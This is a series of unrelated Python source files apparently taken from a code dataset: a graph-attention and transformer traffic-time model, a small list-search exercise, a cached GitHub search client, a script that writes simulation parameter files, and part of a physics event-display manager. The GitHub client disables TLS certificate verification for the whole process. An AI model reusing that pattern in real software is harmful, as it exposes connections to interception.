          sin1 = vector1[1]/np.linalg.norm(vector1)\n                # vector2_ = [e2_pro[2]-e1_pro[0], e2_pro[3]-e1_pro[1]]  # compute the third point\n                # vector2_ = np.array([cos1*vector2_[0]+sin1*vector2_[1],-sin1*vector2_[0] +cos1*vector2_[1]])  # given the first point, the third point tells a left turn from a right turn\n                if (e2_pro[2]-e1_pro[0])*(-sin1) + (e2_pro[3]-e1_pro[1])*cos1 >= 0:  # right turn\n                    type_turning = 2\n                else:  # left turn\n                    type_turning = 3\n            edges[v] = (type_turning, (self.edge_id2index_dict[e1],\n                                       self.edge_id2index_dict[e2]), e1_pro+e2_pro+n_pro)\n            # out-degree bookkeeping per node\n            out_dict[self.edge_id2index_dict[e1]] = out_dict.get(\n                self.edge_id2index_dict[e1], []) + [self.edge_id2index_dict[e2]]\n            # in-degree bookkeeping per node\n            in_dict[self.edge_id2index_dict[e2]] = in_dict.get(\n                self.edge_id2index_dict[e2], [])+[self.edge_id2index_dict[e1]]\n            # map each node tuple to its edge\n            node2edge_dict[(self.edge_id2index_dict[e1],\n                            self.edge_id2index_dict[e2])] = v\n        return EdgeGraph._make([nodes, edges, in_dict, out_dict, node2edge_dict])\n\n\nclass Predictor(nn.Module):\n    def __init__(self, in_feat, out_feat, activation):\n        super(Predictor, self).__init__()  # was missing; nn.Module must be initialized\n        self.predictor = nn.Linear(in_feat, out_feat)\n        self.activation = activation()  # instantiate the activation class passed in\n\n    def forward(self, x):\n        return self.activation(self.predictor(x))\n\n\nclass ArGenerator(nn.Module):\n    def __init__(self, generator, n_grucell, e_grucell, hidden_dim):\n        super(ArGenerator, self).__init__()  # was missing; nn.Module must be initialized\n        self.generator = generator\n        self.n_grucell = n_grucell\n        self.e_grucell = e_grucell\n        self.n_predictor = Predictor(hidden_dim, 1, nn.Sigmoid)\n        self.e_predictor = Predictor(hidden_dim, 1, nn.ReLU)\n        self.n_predictor_sigma2 = Predictor(hidden_dim, 1, nn.ReLU)\n        self.e_predictor_sigma2 = Predictor(hidden_dim, 1, nn.ReLU)\n\n    def forward(self, g, in_feat, hid_feat):\n        x_n, x_e = self.generator(g, in_feat)\n        _, batch_size, feat_dim = x_n.shape\n        _, _, hid_dim = hid_feat.shape  # was unpacking the tensor itself rather than its shape\n        h_n = self.n_grucell(\n            x_n.view(-1, feat_dim), hid_feat.view(-1, hid_dim)).view(-1, batch_size, hid_dim)\n        h_e = self.e_grucell(\n            x_e.view(-1, feat_dim), hid_feat.view(-1, hid_dim)).view(-1, batch_size, hid_dim)\n\n        return h_n, self.n_predictor(h_n), h_e, self.e_predictor(h_e)\n\n\nclass TestModel(nn.Module):\n    def __init__(self):\n        super(TestModel, self).__init__()\n        self.lr = nn.Linear(10, 1)\n\n    def 
forward(self, x):\n return self.lr(x)\n\n\nclass LeimPatcher(nn.Module):\n def __init__(self, args):\n super(LeimPatcher, self).__init__()\n # out_dim = args['out_dim']\n\n # 时间信息\n self.slot_size = args['slot_size']\n self.time_embedding_dim = args['time_embedding_size']\n self.day_embedding_dim = args['day_embedding_size']\n self.device = args['device']\n\n self.day_in_week_embedding = nn.Embedding(7, self.day_embedding_dim)\n self.time_in_day_embedding = nn.Embedding(\n int(24*60/self.slot_size), self.time_embedding_dim)\n self.g, self.inv_g = args['g'], args['inv_g']\n if args['road_network'] is not None:\n self.node_pro_dim = len(\n args['road_network'].node_dict[0]) # 原始node\n self.edge_pro_dim = len(\n args['road_network'].edge_dict[0]) # 原始edge\n self.node_size = len(args['road_network'].edge_graph.nodes)\n self.edge_size = len(args['road_network'].edge_graph.edges)\n else:\n self.node_pro_dim = self.edge_pro_dim = self.node_size = self.edge_size = 10\n\n # 公用的参数\n dropout = args['dropout']\n # 路段、转化点的隐向量维度\n edge_hidden_size = args['edge_hidden_size']\n turning_hidden_size = args['turning_hidden_size']\n # patcher_gat_param = args['patcher_gat_param']\n # patcher_gat_param['edge_type_num'] = len(self.graph.turning_types)\n args['patcher_gat_param']['in_dim'] = (\n self.edge_pro_dim, 2*self.edge_pro_dim+self.node_pro_dim)\n self.patcher_gat_param = GATParam(**args['patcher_gat_param'])\n print(self.patcher_gat_param)\n\n # 道路属性的编码(meta-learner)\n self.edge_weight_nn = nn.Sequential(\n nn.Linear(self.edge_pro_dim, edge_hidden_size),\n nn.ReLU(),\n nn.Dropout(dropout),\n nn.Linear(edge_hidden_size,\n self.patcher_gat_param.node_feature_dim),\n # nn.Sigmoid()\n )\n # 道路交叉点使用两条边加中间节点的属性信息(meta-learner)\n self.turning_weight_nn = nn.Sequential(\n nn.Linear(\n 2*self.edge_pro_dim+self.node_pro_dim, turning_hidden_size),\n nn.ReLU(),\n nn.Dropout(dropout),\n nn.Linear(turning_hidden_size,\n self.patcher_gat_param.edge_feature_dim),\n # nn.Sigmoid()\n )\n\n # 构建patcher\n self.patcher_gat = GAT(*tuple(self.patcher_gat_param))\n # self.generator_gat_param = args['generator_gat_param']\n # self.generator_gat = GAT(*tuple(self.generater_gat_param))\n\n # # 构建encoder中的GRU\n # self.grucell_param = GRUCellParam(**args['patcher_grucell_param'])\n # self.grucell = nn.GRUCell(*tuple(self.grucell_param))\n # # 构建meta gru (从node和edge feat修饰 输入和hidden)\n # self.nodefeat2input = nn.Parameter(torch.zeros(\n # size=(self.patcher_gat_param.node_feature_dim, self.grucell_param.input_size * self.patcher_gat_param.out_dim)))\n # nn.init.xavier_uniform_(self.nodefeat2input.data, gain=1.414)\n # self.edgefeat2input = nn.Parameter(torch.zeros(\n # size=(self.patcher_gat_param.edge_feature_dim, self.grucell_param.input_size * self.patcher_gat_param.out_dim)))\n # nn.init.xavier_uniform_(self.edgefeat2input.data, gain=1.414)\n # self.nodefeat2hidden = nn.Parameter(torch.zeros(\n # size=(self.patcher_gat_param.node_feature_dim, self.grucell_param.hidden_size * self.grucell_param.hidden_size)))\n # nn.init.xavier_uniform_(self.nodefeat2input.data, gain=1.414)\n # self.edgefeat2hidden = nn.Parameter(torch.zeros(\n # size=(self.patcher_gat_param.edge_feature_dim, self.grucell_param.hidden_size * self.grucell_param.hidden_size)))\n # nn.init.xavier_uniform_(self.edgefeat2hidden.data, gain=1.414)\n\n # assert self.gru_param.input_size == self.patcher_gat_param.out_dim\n\n # 周期性质和节点特征做矩阵乘法得到基准预测结果\n self.base_n_mu = nn.Parameter(torch.zeros(\n size=(self.patcher_gat_param.out_dim, 
self.day_embedding_dim+self.time_embedding_dim)))\n nn.init.xavier_uniform_(self.base_n_mu.data, gain=1.414)\n self.base_n_sigma = nn.Parameter(torch.zeros(\n size=(self.patcher_gat_param.out_dim, self.day_embedding_dim+self.time_embedding_dim)))\n nn.init.xavier_uniform_(self.base_n_sigma.data, gain=1.414)\n # Predictor(self.day_embedding_dim+self.time_embedding_dim,1,nn.Sigmoid)\n self.base_e_mu = nn.Parameter(torch.zeros(\n size=(self.patcher_gat_param.out_dim, self.day_embedding_dim+self.time_embedding_dim)))\n nn.init.xavier_uniform_(self.base_e_mu.data, gain=1.414)\n self.base_e_sigma = nn.Parameter(torch.zeros(\n size=(self.patcher_gat_param.out_dim, self.day_embedding_dim+self.time_embedding_dim)))\n nn.init.xavier_uniform_(self.base_e_sigma.data, gain=1.414)\n\n # self.g = self.g.to(self.device)\n # self.inv_g = self.inv_g.to(self.device)\n\n def to(self, device):\n super().to(device)\n self.g, self.inv_g = self.g.to(\n device), self.inv_g.to(device)\n\n def forward(self, x):\n # is_train: 如果是训练的话,那么y是和x具有一样的表示,都是稀疏的分布表示\n '''input: encoder_x: (day: Tensor([batch_size]), time: Tensor([batch_size)'''\n '''output: node_out: Tensor([batch_size, node_size, out_dim]), edge_out: Tensor([batch_size, edge_size, out_dim])'''\n\n day, time = x\n # print(type(self.g))\n\n batch_size = len(day)\n\n temporal_emb = torch.cat([self.day_in_week_embedding(\n day), self.time_in_day_embedding(time)], dim=-1) # [batch_size, day_dim+time+dim]\n\n # 调用patcher获得补全\n # node_h, edge_h = self.patcher_gat(self.g, self.inv_g, (node_feat.view(batch_size*time_steps, node_size, -1).transpose(\n # 1, 0), edge_feat.view(batch_size*time_steps, edge_size, -1).transpose(1, 0)))\n\n # node_h = node_h.transponse(1, 0).contiguous().view(\n # batch_size, node_size, time_steps, -1)\n # edge_h = edge_h.transpose(1, 0).contiguous().view(\n # batch_size, edge_size, time_steps, -1)\n # 编码得到dgl图点边的属性\n self.g.ndata['pro'] = self.edge_weight_nn(self.g.ndata['raw_pro'])\n self.inv_g.ndata['pro'] = self.edge_weight_nn(\n self.inv_g.ndata['raw_pro'])\n self.g.edata['pro'] = self.turning_weight_nn(self.g.edata['raw_pro'])\n self.inv_g.edata['pro'] = self.turning_weight_nn(\n self.inv_g.edata['raw_pro'])\n\n node_h, edge_h = self.patcher_gat(self.g, self.inv_g)\n # 过一下GRU\n # node_h, edge_h = self.gruprocess(self.g, (node_h, edge_h), None)\n\n # 基准\n n_mu = torch.bmm(\n torch.matmul(node_h, self.base_n_mu).unsqueeze(0).repeat(batch_size, 1, 1), temporal_emb.view(batch_size, -1, 1)).view(batch_size, self.node_size)\n\n # n_mu = self.g.ndata['mintime'].unsqueeze(\n # 0).repeat(batch_size, 1)/n_mu # 考虑到最大的\n\n n_sigma2 = torch.bmm(\n torch.matmul(node_h, self.base_n_sigma).unsqueeze(0).repeat(batch_size, 1, 1), temporal_emb.view(batch_size, -1, 1)).view(batch_size, self.node_size)\n\n e_mu = torch.bmm(\n torch.matmul(edge_h, self.base_e_mu).unsqueeze(0).repeat(batch_size, 1, 1), temporal_emb.view(batch_size, -1, 1)).view(batch_size, self.edge_size)\n\n e_sigma2 = torch.bmm(\n torch.matmul(edge_h, self.base_e_sigma).unsqueeze(0).repeat(batch_size, 1, 1), temporal_emb.view(batch_size, -1, 1)).view(batch_size, self.edge_size)\n # print(n_mu[:, :100], n_sigma[:, :100], e_mu[:, :100], e_sigma[:, :100])\n # print(n_mu.shape)\n return n_mu, n_sigma2**2, e_mu, e_sigma2**2\n\n# def gruprocess(self, g, x, hid):\n # # x: ([node_size, batch_size, time_steps, -1], [edge_size, batch_size, time_steps, -1]), hid: None\n # node_pro = g.ndata['pro']\n # edge_pro = g.edata['pro']\n # x_node, x_edge = x\n # batch_size, node_size, time_steps, _ = x_node\n 
# _, edge_size, _, _ = x_edge\n # if hid is None:\n # hid_node = torch.zeros(\n # size=(batch_size*node_size, self.grucell_param.hidden_size))\n # hid_edge = torch.zeros(\n # size=(batch_size*edge_size, self.grucell_param.hidden_size))\n # node_output = []\n # edge_output = []\n # for i in range(time_steps):\n # hid_node = self.grucell(torch.bmm(torch.matmul(node_pro, self.nodefeat2input).view(node_size, self.grucell_param.input_size, -1).repeat(batch_size, 1, 1), x_node[:, :, i, :].view(-1, self.patcher_gat_param.out_dim, 1)).view(-1, self.grucell_param.input_size), torch.bmm(\n # torch.matmul(node_pro, self.nodefeat2hidden).view(node_size, self.grucell_param.hidden_size, -1).repeat(batch_size, 1, 1), hid_node.view(-1, self.grucell_param.hidden_size, 1)).view(-1, self.grucell_param.hidden_size))\n\n # hid_edge = self.grucell(torch.bmm(torch.matmul(edge_pro, self.edgefeat2input).view(edge_size, self.grucell_param.input_size, -1).repeat(batch_size, 1, 1), x_edge[:, :, i, :].view(-1, self.patcher_gat_param.out_dim, 1)).view(-1, self.grucell_param.input_size), torch.bmm(\n # torch.matmul(edge_pro, self.edgefeat2hidden).view(edge_size, self.grucell_param.hidden_size, -1).repeat(batch_size, 1, 1), hid_edge.view(-1, self.grucell_param.hidden_size, 1)).view(-1, self.grucell_param.hidden_size))\n\n # node_output.append(hid_node)\n # edge_output.append(hid_edge)\n\n # return torch.stack(node_output, dim=1).view(batch_size, node_size, time_steps, -1), torch.stack(edge_output, dim=1).view(batch_size, edge_size, time_steps, -1)\n\n\n'''实现一个时空融合的transformer编码和解码器得到每条路段以及每个交叉口的通勤时间'''\n\nSTParam = namedtuple('STParam', ['embedding_size_1', 'lens', 'embedding_size_2', 'hidden_size', 'num_layers', 'num_heads', 'total_key_depth', 'total_value_depth',\n 'filter_size', 'max_length', 'input_dropout', 'layer_dropout',\n 'attention_dropout', 'relu_dropout', 'use_mask', 'act', 'kernel_size', 'wide', 'height'])\n\n# class STTransformer(nn.Module):\n# def __init__(self, args):\n\n\nclass STTransformer(nn.Module):\n \"\"\"\n A Transformer Module For BabI data. 
\n    Inputs should be in the shape story: [batch_size, memory_size, story_len ]\n    query: [batch_size, 1, story_len]\n    Outputs will have the shape [batch_size, ]\n    \"\"\"\n\n    def __init__(self, embedding_size_1, lens, embedding_size_2, hidden_size, num_layers, num_heads, total_key_depth, total_value_depth,\n                 filter_size, max_length, input_dropout, layer_dropout,\n                 attention_dropout, relu_dropout, use_mask, act, kernel_size, wide, height):\n        super(STTransformer, self).__init__()\n        # self.encoder_input_size = embedding_size #\n        self.transformer_enc = Encoder(embedding_size_1, hidden_size, num_layers, num_heads, total_key_depth, total_value_depth,\n                                       filter_size, lens, input_dropout, layer_dropout,\n                                       attention_dropout, relu_dropout, act, kernel_size, wide, height)\n\n        self.transformer_dec = Decoder(embedding_size_2, hidden_size, num_layers, num_heads, total_key_depth, total_key_depth, filter_size,\n                                       max_length, input_dropout, layer_dropout, attention_dropout, relu_dropout, act, kernel_size, wide, height, use_mask)\n\n        self.generator = nn.Sequential(\n            nn.Linear(hidden_size, hidden_size),\n            nn.ReLU(),  # was nn.Rel(), which does not exist\n            nn.Linear(hidden_size, 2)\n        )\n\n    def forward(self, x_enc, x_dec, src_mask, n_mu, n_sigma2, e_mu, e_sigma2, n_min_time):\n        # x_enc: [batch_size, enc_seq_length, w, h, 2]\n        # x_dec: [batch_size, dec_seq_length, node_edge_embedding]\n        # src_mask: [batch_size, dec_seq_length]\n        # n_sigma2, n_mu, n_min_time: [batch_size, dec_node_length]\n        # e_mu, e_sigma2: [batch_size, dec_edge_length]\n\n        encoder_output = self.transformer_enc(x_enc)\n        decoder_output = self.transformer_dec(x_dec, encoder_output, src_mask)\n        src_node_mask = src_mask[:, ::2]\n        src_edge_mask = src_mask[:, 1::2]\n        decoder_node = (n_min_time /\n                        torch.sigmoid(decoder_output[:, :, 0][:, ::2]*n_sigma2+n_mu)).masked_fill(src_node_mask == 0, 0)\n\n        decoder_edge = torch.relu(\n            decoder_output[:, :, 1][:, 1::2]*e_sigma2+e_mu).masked_fill(src_edge_mask == 0, 0)\n\n        return decoder_node, src_node_mask, decoder_edge, src_edge_mask\n\n\nclass Leim(nn.Module):\n    def __init__(self, args):\n        super(Leim, self).__init__()  # was missing; nn.Module must be initialized\n        # self._pather = LeimPatcher(args)  # obtains the time information for every link; link-specific values are extracted from it later\n        self._pather = LeimPatcher(args)\n\n        stParam = STParam(**args['stparam'])\n        self._transformer = STTransformer(*tuple(stParam))\n\n        # map edge and node features into the same dimension\n        # encoding of the road attributes (meta-learner)\n        self.node_emb = nn.Linear(\n            args['g'].ndata['raw_pro'].shape[-1], stParam.embedding_size_2)  # trailing comma removed: it silently wrapped the layer in a tuple\n        # road intersections use the attributes of the two edges plus the node in between (meta-learner)\n        self.edge_emb = nn.Linear(\n            args['g'].edata['raw_pro'].shape[-1], stParam.embedding_size_2)\n\n        self.mintime = nn.Parameter(\n            args['g'].ndata['mintime'], requires_grad=False)  # mintime is set on ndata in buildDglGraph, not edata\n\n    def forward(self, d_t, x_idx, x, src_mask):\n        # x_enc: [batch_size, enc_seq_length, w, h, 2]\n        # node_dec: [batch_size, dec_node_length, raw_node_pro_dim]\n        # edge_dec: [batch_size, dec_edge_length, raw_edge_pro_dim]\n        # node_mask: [batch_size, dec_node_length]\n        # edge_mask: [batch_size, dec_edge_length]\n        n_mu, n_sigma2, e_mu, e_sigma2 = self._pather(d_t)\n\n        x_enc, node_dec, edge_dec = x\n        bs, node_len, _ = node_dec.shape\n        _, edge_len, _ = edge_dec.shape\n        node_dec = self.node_emb(node_dec)\n        edge_dec = self.edge_emb(edge_dec)\n        x_dec = torch.cat([node_dec, edge_dec], dim=1).permute(\n            1, 0, 2).contiguous().view(node_len+edge_len, -1)\n        idx = torch.LongTensor(\n            [i//2 if i % 2 == 0 else i//2+node_len for i in range(node_len+edge_len)])\n        x_dec = x_dec.index_select(index=idx, dim=0).view(\n            node_len+edge_len, bs, -1).permute(1, 0, 2).contiguous()\n\n        n_idx, e_idx = x_idx\n        n_mu = 
torch.stack([n_mu[i].take(n_idx[i]) for i in range(bs)], dim=0)\n n_sigma2 = torch.stack([n_sigma2[i].take(n_idx[i])\n for i in range(bs)], dim=0)\n mintime = torch.stack([self.mintime.take(n_idx[i])\n for i in range(bs)], dim=0)\n e_mu = torch.stack([e_mu[i].take(e_idx[i]) for i in range(bs)], dim=0)\n e_sigma2 = torch.stack([e_sigma2[i].take(e_idx[i])\n for i in range(bs)], dim=0)\n\n decoder_node, src_node_mask, decoder_edge, src_edge_mask = self._transformer(\n x_enc, x_dec, src_mask, n_mu, n_sigma2, e_mu, e_sigma2, mintime)\n return decoder_node, src_node_mask, decoder_edge, src_edge_mask\n","repo_name":"yuanhaitao/STHR_CODE","sub_path":"code/.ipynb_checkpoints/Leim-checkpoint.py","file_name":"Leim-checkpoint.py","file_ext":"py","file_size_in_byte":42951,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"30705054309","text":"# Задайте список. Напишите программу, которая определит, \n# присутствует ли в заданном списке строк некое число.\n\ndef input_list():\n string = input('Введите значения строк через пробел: ').split(' ')\n return string\n\n\ndef find_number(string, number):\n for item in string:\n if number in item:\n print(f'В элементе {item} списка найдено число {number}')\n print(f'Список изучен') \n return\n\n\nstring_list = input_list()\nnum = input('Введите число, которое необходимо найти списке: ')\nprint(string_list)\nfind_number(string_list, num)\n","repo_name":"NazarovIlya/Python","sub_path":"TasksPy/Task020_is_digit_in_list.py","file_name":"Task020_is_digit_in_list.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35677992740","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n# Just in case it's not python 2\ntry:\n import urllib.request as urlrequest\nexcept ImportError:\n import urllib as urlrequest\n\nimport ssl\nimport os\nimport json\nimport time\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\n# Github api\n#\nclass GitHub():\n def __init__(self, no_cache):\n self.sleep_time = 2\n self.url = 'https://api.github.com/search/issues?per_page=100'\n self.no_cache = no_cache\n\n ##\n # Build github query\n #\n # :param query String\n #\n def build_query(self, query):\n return '&q=org:PrestaShop+is:public+-repo:prestashop/prestashop.github.io+' + query\n\n ##\n # Generate github request and return json content\n #\n # :param str query: Represents a GitHub query\n # :param bool is_issue: Is issue or pull request\n #\n def get_json(self, query, is_issue=True):\n query_type = ('is:issue' if is_issue else 'is:pr')\n\n # Debug only\n # print(\n # 'Processing request for query: {query_type}+{query}'.format(\n # query=query,\n # query_type=query_type\n # )\n # )\n\n filename = 'cache/{query}-{query_type}'.format(\n query=query,\n query_type=query_type\n )\n\n if os.path.exists('./' + filename) and not self.no_cache:\n with open(filename, 'r') as f:\n data = f.read()\n else:\n data = urlrequest.urlopen(\n self.url +\n self.build_query(query) +\n '+' +\n query_type\n ).read().decode('utf-8')\n\n with open(filename, 'w') as f:\n f.write(data)\n time.sleep(self.sleep_time)\n\n return json.loads(data)\n","repo_name":"DemoOctober/Python","sub_path":"core_weekly/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
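The `GitHub.get_json` method in the record above caches each raw search response on disk and only sleeps (to respect the search-API rate limit) after a cache miss. A minimal standalone sketch of that cache-then-fetch pattern, assuming a hypothetical `fetch` callable injected by the caller in place of the `urllib` request:

```python
import json
import os
import time


def cached_fetch(url, cache_path, fetch, sleep_time=2):
    """Return parsed JSON for `url`, reading from `cache_path` on a hit."""
    if os.path.exists(cache_path):
        # Cache hit: reuse the raw response saved by an earlier run.
        with open(cache_path, "r") as f:
            return json.loads(f.read())
    # Cache miss: fetch, persist the raw body, then throttle.
    data = fetch(url)  # e.g. urllib.request.urlopen(url).read().decode("utf-8")
    with open(cache_path, "w") as f:
        f.write(data)
    time.sleep(sleep_time)  # crude rate limiting, as in GitHub.get_json
    return json.loads(data)
```

Shaped this way, repeated runs over the same queries never touch the network, which is exactly what the class above relies on when rebuilding its reports.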
+{"seq_id":"42214827243","text":"\n\nimport sys\n\nin_file = sys.argv[1] # GRCh38.d1.vd1.sizes\nout_pref = sys.argv[2]\n\nh_chrom_size = {}\nall_chrom_size = 0\nwith open(in_file,'r') as hin:\n for line in hin:\n line = line.rstrip('\\n')\n F = line.split('\\t')\n \n h_chrom_size[F[0]] = int(F[1])\n all_chrom_size += int(F[1])\n if F[0] == 'chrY':\n break\n \nDUPLICATION_number = 2500\nINDEL_number = 5000\nINVERSION_number = 100\nINV_del_number = 50\nINV_dup_number = 50\n\nl_chrom = [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\",\"20\",\"21\",\"22\",\"X\",\"Y\"]\nfor i in l_chrom:\n percentage = h_chrom_size[\"chr\"+i] / all_chrom_size \n dup_mumber = round(DUPLICATION_number * percentage)\n indel_mumber = round(INDEL_number * percentage)\n inv_mumber = round(INVERSION_number * percentage)\n invdel_mumber = round(INV_del_number * percentage)\n invdup_mumber = round(INV_dup_number * percentage)\n \n with open(out_pref+\"_chr\"+i,'w') as hout:\n dup_str = \"DUPLICATION_minimum_length: 100\\nDUPLICATION_maximum_length: 10000\\nDUPLICATION_number: %d\\n\" % dup_mumber\n indel_str = \"INDEL_minimum_length: 100\\nINDEL_maximum_length: 10000\\nINDEL_number: %d\\n\" % indel_mumber\n trans_str = \"TRANSLOCATION_minimum_length: 0\\nTRANSLOCATION_maximum_length: 0\\nTRANSLOCATION_number: 0\\n\"\n inv_str = \"INVERSION_minimum_length: 10\\nINVERSION_maximum_length: 10000\\nINVERSION_number: %d\\n\" % inv_mumber\n invdel_str = \"INV_del_minimum_length: 100\\nINV_del_maximum_length: 10000\\nINV_del_number: %d\\n\" % invdel_mumber\n invdup_str = \"INV_dup_minimum_length: 100\\nINV_dup_maximum_length: 10000\\nINV_dup_number: %d\" % invdup_mumber\n print(dup_str+indel_str+trans_str+inv_str+invdel_str+invdup_str, file=hout)\n\n","repo_name":"ncc-gap/simulation_sv_set","sub_path":"script/make_parameter_file.py","file_name":"make_parameter_file.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2594207298","text":"import os\n\nfrom pyqtgraph.Qt import QtCore\n\nfrom ROOT import gallery\nfrom ROOT import TFile\nfrom ROOT import vector as ROOTvector\nfrom ROOT import string as ROOTstring\n\n# from memory_profiler import profile\n\ntry:\n from event import manager, event\nexcept ImportError:\n from evdmanager.event import manager, event\n\nimport datatypes\n\n\nclass product(object):\n def __init__(self, name, typeName):\n self._name=name.rstrip(\".\")\n self._typeName=typeName\n self._isAssociation=False\n self._associatedProduct=None\n self._producer=None\n self._instance=None\n self._stage=None\n\n self.parse()\n\n def append_producer(self, s):\n self._producer += s\n\n def producer(self):\n return self._producer\n\n def name(self):\n return self._name\n\n def fullName(self):\n return \"{}:{}:{}\".format(self._producer, self._instance, self._stage)\n\n def typeName(self):\n return self._typeName\n\n def isAssociation(self):\n return self._isAssociation\n\n def stage(self):\n return self._stage\n\n # def associationProduct(self):\n # pass\n\n # def reverseAssociationProduct(self):\n # pass\n\n def parse(self):\n tokens=self._name.split('_')\n # Name goes as object_producer_stage\n self._producer=tokens[-3]\n self._instance=tokens[-2]\n self._stage=tokens[-1]\n self._typeName = tokens[0].rstrip('s')\n\n return\n\n\nclass processer(object):\n\n def __init__(self):\n\n # Storing ana units as a map:\n # self._ana_units[data product] 
-> instance of ana_unit\n self._ana_units = dict()\n pass\n\n # @profile\n def process_event(self, gallery_event):\n # print \"Running ... \"\n for key in self._ana_units:\n # print('Processing', key)\n self._ana_units[key].analyze(gallery_event)\n # print('Size of anaunit after processing', asizeof.asized(self._ana_units[key], detail=2).format())\n\n def add_process(self, data_product, ana_unit):\n if data_product in self._ana_units:\n self._ana_units.pop(data_product)\n self._ana_units.update({data_product : ana_unit})\n return\n\n def remove_process(self, data_product, ana_unit=None):\n if data_product in self._ana_units:\n self._ana_units.pop(data_product)\n return\n\n def get_process(self, data_product):\n if data_product in self._ana_units:\n return self._ana_units[data_product]\n else:\n return None\n\n def get_n_processes(self):\n return len(self._ana_units)\n\n def remove_all_processes(self):\n for data_product in self._ana_units.copy():\n self._ana_units.pop(data_product)\n\n def reset(self):\n self._ana_units = dict()\n\nclass evd_manager_base(manager, QtCore.QObject):\n fileChanged = QtCore.pyqtSignal()\n eventChanged = QtCore.pyqtSignal()\n\n \"\"\"docstring for lariat_manager\"\"\"\n\n def __init__(self, geom, file=None):\n super(evd_manager_base, self).__init__(geom, file)\n manager.__init__(self, geom, file)\n QtCore.QObject.__init__(self)\n # For the larlite manager, need both the ana_processor and\n # the storage manager\n self._processer = processer()\n # self._mgr = fmwk.storage_manager()\n self._data_manager = None\n\n self._keyTable = dict()\n self._drawnClasses = dict()\n\n if file != None:\n self.setInputFiles(file)\n\n self._n_entries = 0\n\n # Toggle whether or not to draw wires:\n self._drawWires = False\n self._drawOpDetWvf = False\n # self._drawParams = False\n # self._drawTruth = False\n\n self._wireDrawer = None\n self._opDetWvfDrawer = None\n # self._truthDrawer = None\n\n # A list that will contain a dictionary with run, subrun, event keys\n self._run_list = []\n\n\n def getAvailableRuns(self):\n '''\n Getter for the available runs\n\n Returns:\n list: A list of all available runs\n '''\n out = []\n for item in self._run_list:\n if item['run'] in out:\n continue\n else:\n out.append(item['run'])\n return out\n\n def getAvailableSubruns(self):\n '''\n Getter for the available subruns\n\n Returns:\n list: A list of all available subruns\n '''\n out = []\n for item in self._run_list:\n if item['subrun'] in out:\n continue\n else:\n out.append(item['subrun'])\n return out\n\n def getAvailableEvents(self):\n '''\n Getter for the available events\n\n Returns:\n list: A list of all available events\n '''\n out = []\n for item in self._run_list:\n if item['event'] in out:\n continue\n else:\n out.append(item['event'])\n return out\n\n\n def pingFile(self, file):\n \"\"\"\n this function opens the file and\n determines what is available to draw\n \"\"\"\n # This function opens the file to see\n # what data products are available\n\n # Open the file\n f = TFile(file)\n e = f.Get(\"Events\")\n\n\n # Get all the (run, subrun, event) IDs\n self._run_list = []\n ev_aux_b = e.GetBranch(\"EventAuxiliary\")\n for i in range(ev_aux_b.GetEntries()):\n ev_aux_b.GetEntry(i)\n ev_aux = e.EventAuxiliary\n self._run_list.append({\n 'run': ev_aux.run(),\n 'subrun': ev_aux.subRun(),\n 'event': ev_aux.event(),\n })\n\n\n # prepare a dictionary of data products\n lookUpTable = dict()\n lookUpTable.update({\"all\" : dict()})\n\n product_list = []\n # Loop over the keys (list of 
trees)\n        for key in e.GetListOfBranches():\n\n            if key.GetTypeName() == 'art::EventAuxiliary':\n                continue\n\n            if \"NuMu\" in key.GetName() and \"Assns\" in key.GetTypeName():\n                if \"PFParticle\" in key.GetTypeName():\n                    continue\n                elif \"Assns\" in key.GetTypeName():\n                    continue\n\n            prod=product(key.GetName(), key.GetTypeName())\n\n            # if \"NuMu\" in key.GetName():\n            #     print \"NuMu stage is \" + str(prod.stage())\n            #     print \"NuMu name is \" + str(prod.fullName())\n            #     print \"NuMu type name is \" + str(prod.typeName())\n            _product = prod._typeName\n\n            # Add the product to the \"all\" list and\n            # also to its stage list:\n\n            # gets three items in thisKeyList, which is a list\n            # [dataProduct, producer, 'tree'] (don't care about 'tree')\n            # check if the data product is in the dict:\n            if _product in lookUpTable['all']:\n                # extend the list:\n                lookUpTable['all'][_product] += (prod, )\n            else:\n                lookUpTable['all'].update({_product: (prod,)})\n\n            if not (prod.stage() in lookUpTable):\n                lookUpTable.update({prod.stage() : dict()})\n            if _product in lookUpTable[prod.stage()]:\n                # extend the list:\n                lookUpTable[prod.stage()][_product] += (prod, )\n            else:\n                lookUpTable[prod.stage()].update({_product: (prod,)})\n\n        self._keyTable.update(lookUpTable)\n\n        f.Close()\n\n        return\n\n    def setInputFile(self, file):\n        f = [file, ]\n        self.setInputFiles(f)\n\n    # @profile\n    def setInputFiles(self, files):\n\n        # reset the storage manager and process\n        if self._data_manager is not None:\n            del self._data_manager\n            self._data_manager = None\n\n        if files is None:\n            return\n\n        _file_list = ROOTvector(ROOTstring)()\n\n        for file in files:\n            # First, check that the file exists:\n            try:\n                if not os.path.exists(file):\n                    print(\"\\033[91m ERROR: requested file does not exist. \\033[0m\")\n                    continue\n            except Exception as e:  # was 'except (Exception, e):', a Python 2 leftover that raises NameError in Python 3\n                print(e)\n                return\n            # Next, verify it is a root file:\n            if not file.endswith(\".root\"):\n                print(\"\\033[91m ERROR: must supply a root file. 
